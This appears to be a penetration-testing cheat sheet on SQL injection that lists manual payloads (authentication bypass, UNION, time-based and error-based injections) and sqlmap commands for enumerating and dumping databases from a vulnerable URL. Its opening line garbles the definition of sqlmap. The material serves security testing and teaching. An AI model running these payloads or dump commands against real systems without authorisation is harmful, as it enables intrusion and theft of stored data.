sqlmap is a tool used to manipulate a web application’s database by injecting malicious SQL statements into a query. It’s one of the most common web application vulnerabilities, often allowing attackers to access or modify sensitive data. Penetration testers and ethical hackers use SQLi techniques to identify and demonstrate potential vulnerabilities in applications, providing crucial insight into the security posture of the system.
Types of SQLi Attacks:
- Error-Based SQLi: Uses error messages from the database to gain insights into the structure and contents of the database.
- Union-Based SQLi: Combines results from multiple queries to retrieve hidden data from the database.
- Boolean-Based Blind SQLi: Tests for vulnerabilities by evaluating the response to true/false conditions without seeing actual database output.
- Time-Based Blind SQLi: Uses database delay functions to determine vulnerability by observing the response time.
Common SQL Injection Payloads and Techniques
AND 1=1: Checks for vulnerability by adding a simple condition that is always true. If the application behaves differently, it could be vulnerable.UNION SELECT: Combines the results of a separate query, allowing access to data from other tables.OR 'a'='a': Often used in login forms to bypass authentication.
Tools and Commands for SQL Injection Testing
Many tools are available to automate SQLi tests. Below are popular commands and options in some of the most widely used tools:
sqlmap
sqlmap is an open-source tool for automating SQL injection detection and exploitation. It supports a variety of SQL injection techniques and offers options to enumerate databases, tables, columns, and more.
Common sqlmap switches:
- -u
<URL>: Specifies the target URL where the SQL injection test will run. - –dbs: Enumerates databases to find accessible ones.
- –tables: Lists tables within a specified database.
- –columns: Displays columns within a table.
- –dump: Extracts data from specified columns.
- -D
<database>: Specifies the database to target in further commands. - -T
<table>: Specifies the table for extraction. - -C
<columns>: Selects specific columns for data retrieval. - –level: Sets the intensity of tests (default is 1, higher values run more in-depth tests).
- –risk: Specifies the level of risk (1-3) to adapt payloads based on expected impact.
Example sqlmap commands:
- Check for vulnerability:
> sqlmap -u "http://example.com/item?id=1" --batch
This command performs a basic scan on the specified URL without prompting for user interaction. - Enumerate databases:
> sqlmap -u "http://example.com/item?id=1" --dbs
This command retrieves a list of available databases. - Dump all records from a table:
> sqlmap -u "http://example.com/item?id=1" -D database_name -T table_name --dump
Manual SQL Injection Commands
For applications that require manual testing, here are some SQL payloads that are often used to test various injection points:
- Extract Database Version:
> SELECT @@version
This command reveals the version of the database. - Union-Based Payload:
> ' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users'-- - Authentication Bypass:
> ' OR '1'='1'--
This payload is often used in login forms to bypass authentication by creating a condition that is always true.
Advanced SQLi Techniques
- Time-Based SQL Injection:
> ' OR IF(1=1,SLEEP(5),0)--
This payload checks for vulnerability by causing a delay in the database response if the query is true. - Error-Based SQL Injection:
> ' AND 1=CONVERT(int, (SELECT COUNT(*) FROM information_schema.tables))--
This type leverages error messages to reveal information about the database structure.
Examples and Use Cases
Identify Available Databases:
> sqlmap -u "http://example.com/item?id=1" --dbsThis command will reveal databases accessible through the vulnerable endpoint.
Test for Blind SQL Injection:
Using time-based techniques with sqlmap:
> sqlmap -u "http://example.com/item?id=1" --time-sec=5Setting a delay parameter helps detect vulnerabilities without visible feedback.
Full Exploitation Example
Assume a URL with a vulnerable id parameter:
> sqlmap -u "http://example.com/item?id=1" --dbs --tables --columns --dumpThis command will enumerate databases, tables, columns, and retrieve the data if possible, fully exploiting the vulnerability.